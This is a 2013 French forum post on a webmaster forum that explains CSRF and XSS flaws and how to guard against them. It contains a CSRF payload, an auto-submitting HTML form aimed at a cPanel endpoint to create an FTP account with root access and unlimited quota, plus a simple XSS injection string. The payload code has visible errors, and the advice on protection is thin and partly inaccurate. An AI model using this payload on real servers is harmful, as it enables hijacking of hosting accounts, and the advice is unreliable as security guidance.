Titre: Détecter une faille et se protéger
Posté par: Foxvirus le le 20-02-2013 a 19:21:54
Bonjour, bonsoir a tout.
Je vais vous dire comment détecter les faille type XSS, CSRF
La faille CSRF.
La faille CSRF et une faille Cpanel
ce script s'attaque au cPanel . Donc si. Les autres Failles CSRF nécessite l’absence de la protection CSRF. Après il faut que l'Admin ne supprime pas ses cookies .
Code:
<html>
<body onload="jfireForms()">
<form method="POST" name="forms0" action="
http://site-cible.com:2082/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="Login"/>
<input type="hidden" name="password" value="Pass"/>
<input type="hidden" name="password2" value="Pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</from>
</body>
</html> |
|
Comment se protégé il faut que l'Admin supprime ses cookies . Après chaque déconnexion au Cpanel
Faille XSS
La faille XSS apparait quand les donnés sont transmisent par l'URL ou l'on envoi des parametres : http://www.lesite.com/index.php?lol=4§xd=78
La, on envoi deux parametres a la page qui traite les donnés :
- Le parametre lol qui a comme valeur 4
- Le parametre xd qui a comme valeur 78
Il injecte le code html, php ect...
Code:
| error=<input type="text" value="code_injecté"> |
|
Comment se protégé
Allez sur la page affichant les donnés envoyer par l'URL et rajoutons htmlspecialchars derriere l'affichage de la variable comme ceci :
Code:
| <?php echo htmlspecialchars($_POST['variable']); ?> |
|
Voila c'est super simple mais pleins de Webmaster oublient de le faire donc la faille est trés fréquente !!! |
Forum-webmaster | Actionné par YaBB SE
© 2001-2003, YaBB SE Dev Team. Tous droits réservés.
|